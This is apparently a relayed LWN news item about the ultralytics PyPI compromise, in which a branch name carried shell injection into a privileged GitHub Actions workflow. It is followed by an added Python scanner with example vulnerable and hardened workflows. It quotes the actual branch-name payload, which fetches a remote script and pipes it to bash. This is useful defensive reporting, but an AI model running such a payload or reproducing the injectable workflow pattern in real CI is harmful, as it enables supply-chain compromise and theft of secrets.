Abusing Git branch names to compromise a PyPI package
Date:
Fri, 06 Dec 2024 18:44:12 +0000
Description:
A compromised release was uploaded to PyPI after a project automatically processed a pull request with a flawed script.
The GitHub account "OpenIM Robot" (which appears to be controlled by Xinwei Xiong) opened a pull request for the ultralytics Python package. The pull request included a suspicious Git branch name: openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)
Unfortunately, ultralytics uses the pull_request_target GitHub Action trigger to automate some of its continuous integration tasks. This runs a script from the base branch of the repository, which has access to the repository's secrets, but that script was vulnerable to a shell injection attack from the branch name of the pull request. The injected script appears to have used the credentials it had access to in order to compromise a later release uploaded to PyPI so that it included a cryptocurrency miner. It is hard to be sure of the details, because GitHub has already pulled the malicious script. This problem has been known for several years, but this event may serve as a good reminder to be careful with automated access to important secrets.
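The flaw described above is a workflow pattern rather than a bug in any one script: a "${{ ... }}" expression is substituted into a run: step's text before the shell ever starts, so a branch name containing shell syntax becomes part of the command. The scanner below is an added illustration, not part of the LWN story and not ultralytics' own workflow; the two workflow texts are constructed, and the function names (run_steps, find_injections, assess) are hypothetical. It flags run: steps that expand pull-request-controlled contexts inline, rates the finding higher when the workflow also runs under pull_request_target (and therefore with secrets), and shows the hardened form beside it: the same value passed through env: and read back as a quoted shell variable, which GitHub's own documentation recommends.

```python
"""Flag GitHub Actions `run:` steps that interpolate attacker-controlled
pull-request data directly into a shell script.

Added illustration, not ultralytics' workflow. The workflow texts below are
constructed; the scanner is a line-oriented approximation of YAML, not a
full parser, and the helper names are hypothetical."""
import re

# Expression contexts that carry text the PR author controls: the branch
# name that was abused here, plus PR title/body, commit messages, comments.
UNTRUSTED_CONTEXTS = (
    "github.head_ref",
    "github.event.pull_request.head.ref",
    "github.event.pull_request.head.label",
    "github.event.pull_request.title",
    "github.event.pull_request.body",
    "github.event.head_commit.message",
    "github.event.commits",
    "github.event.issue.title",
    "github.event.issue.body",
    "github.event.comment.body",
)

EXPR_RE = re.compile(r"\$\{\{\s*(.*?)\s*\}\}")                  # ${{ ... }}
RUN_RE = re.compile(r"^(\s*)(?:-\s+)?run:\s*([|>]?)\s*(.*)$")    # `run:` keys


def run_steps(text):
    """Yield (line_number, script) for each `run:` step, handling both
    `run: cmd` and block-scalar `run: |` / `run: >` forms."""
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        m = RUN_RE.match(lines[i])
        if not m:
            i += 1
            continue
        indent, block_style, rest = len(m.group(1)), m.group(2), m.group(3)
        lineno = i + 1
        body = [rest] if rest else []
        i += 1
        if block_style:
            # Continuation lines are those indented deeper than the `run:` key.
            while i < len(lines) and (
                not lines[i].strip()
                or len(lines[i]) - len(lines[i].lstrip()) > indent
            ):
                body.append(lines[i].strip())
                i += 1
        yield lineno, "\n".join(body)


def find_injections(text):
    """Return [(line_number, expression)] for untrusted expressions expanded
    inline in a run script. Substitution happens before the shell starts, so
    quoting inside the script cannot help; the fix is to pass the value
    through `env:` and reference it as a quoted shell variable."""
    findings = []
    for lineno, script in run_steps(text):
        for expr in EXPR_RE.findall(script):
            if any(expr.startswith(ctx) for ctx in UNTRUSTED_CONTEXTS):
                findings.append((lineno, expr))
    return findings


def uses_privileged_trigger(text):
    """True if the workflow runs on pull_request_target, i.e. with secrets."""
    return re.search(r"\bpull_request_target\b", text) is not None


def assess(text):
    """'high' when secrets and injection are both present, 'medium' for
    injection without secrets, 'ok' when nothing untrusted is expanded."""
    findings = find_injections(text)
    if not findings:
        return "ok", findings
    return ("high" if uses_privileged_trigger(text) else "medium"), findings


# Constructed: the vulnerable shape (untrusted branch name inside run:).
VULNERABLE_WORKFLOW = """name: CI
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - name: Report branch
        run: |
          echo "Checking branch ${{ github.head_ref }}"
          ./scripts/lint.sh
"""

# Constructed: same step, hardened. The untrusted value reaches the shell
# only as an environment variable, which is data and is never parsed as code.
HARDENED_WORKFLOW = """name: CI
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - name: Report branch
        env:
          BRANCH: ${{ github.head_ref }}
        run: |
          echo "Checking branch $BRANCH"
          ./scripts/lint.sh
"""

if __name__ == "__main__":
    for label, wf in (("vulnerable", VULNERABLE_WORKFLOW),
                      ("hardened", HARDENED_WORKFLOW)):
        level, hits = assess(wf)
        print(f"{label}: {level} {hits}")
```

Run as a script it reports the constructed vulnerable workflow as "high" with the github.head_ref expansion on its run: line and the hardened one as "ok". The env: indirection is the whole fix: the branch name still arrives, but as the contents of $BRANCH, so "$BRANCH" in double quotes is printed rather than executed. The regex check for pull_request_target is deliberately loose (it would also match the word in a comment), which errs toward reviewing a workflow rather than missing one.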
======================================================================
Link to news story:
https://lwn.net/Articles/1001215/
--- Mystic BBS v1.12 A47 (Linux/64)
* Origin: tqwNet UK HUB @ hub.uk.erb.pw (1337:1/100)